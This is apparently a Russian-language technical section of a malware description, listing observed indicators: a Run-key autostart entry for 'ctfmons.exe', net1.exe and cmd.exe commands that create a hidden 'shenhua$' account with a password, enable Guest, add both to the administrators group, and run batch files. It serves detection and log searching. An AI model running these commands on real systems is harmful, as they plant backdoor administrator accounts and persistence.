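Техническая информация
Ниже перечислены наблюдавшиеся признаки активности: запись в ключе автозапуска Run (закрепление в системе), командные строки net1.exe и cmd.exe (создание и активация учётных записей, добавление их в локальную группу, запуск пакетных файлов) и пути к пакетным файлам (их роль — созданы, изменены или удалены — на странице не указана). Обозначения <HKLM>, <SYSTEM32>, <Текущая директория> и %USERNAME% — подстановки отчёта, а не буквальные значения; «%USERNAME%s», вероятно, получилось из имени группы Administrators после автоматической замены имени пользователя — это стоит учитывать при поиске по журналам.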
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ctfmons.exe' = 'C:\WINNT\system\ctfmons.exe'
- <SYSTEM32>\net1.exe localgroup %USERNAME%s Guest /add
- <SYSTEM32>\net1.exe user shenhua$ !!!@@@QQQaaa /ad
- <SYSTEM32>\net1.exe localgroup %USERNAME%s shenhua$ /ad
- <SYSTEM32>\cmd.exe /c ""<Текущая директория>\kill.bat""
- <SYSTEM32>\cmd.exe /c "C:\Documents and Settings\admin.bat"
- <SYSTEM32>\net1.exe user Guest /active:yes
- <SYSTEM32>\net1.exe user Guest !!!@@@QQQaaa /add
- <Текущая директория>\kill.bat
- C:\Documents and Settings\admin.bat